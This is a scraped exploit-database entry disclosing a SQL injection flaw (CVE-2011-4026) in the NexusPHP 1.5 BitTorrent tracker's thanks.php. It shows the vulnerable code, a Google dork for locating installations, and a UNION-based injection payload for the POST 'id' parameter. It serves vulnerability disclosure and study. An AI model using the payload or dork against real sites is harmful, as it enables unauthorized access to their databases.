Lucene search

K
exploitpackFlyh4tEXPLOITPACK:B2CF5918BC29D5EBDD7C607E869CCEAE
HistoryOct 08, 2011 - 12:00 a.m.

NexusPHP 1.5 - SQL Injection

2011-10-0800:00:00
flyh4t
7

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

NexusPHP 1.5 - SQL Injection

# Exploit Title: Nexusphp.v1.5 SQL injection Vulnerability
# Google Dork: intitle:nexusphp
# Date: 2011-10-08
# Author: flyh4t
# Software Link: http://sourceforge.net/projects/nexusphp/
# Version: nexusphp.v1.5
# Tested on: linux+apache
# CVE : CVE-2011-4026


Nexusphp is BitTorrent private tracker scripts written in PHP 
The codes is here http://sourceforge.net/projects/nexusphp/
There is a sql injectiong Vulnerability in thanks.php.
 
-----------------------vul code-------------------
//thanks.php
if ($_GET['id'])
 stderr("Party is over!", "This trick doesn't work anymore. You need to click the button!");
$userid = $CURUSER["id"];
$torrentid = $_POST["id"];
$tsql = sql_query("SELECT owner FROM torrents where id=$torrentid");
$arr = mysql_fetch_array($tsql);
-----------------------vul code end-------------------
 
 $_POST["id"] is not checked, lead a sql injection Vulnerability

-----------------------exploit-------------------

_POST[id] : -1 union select version()>4/*

-----------------------exploit end -------------------

7.5 High

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

Related for EXPLOITPACK:B2CF5918BC29D5EBDD7C607E869CCEAE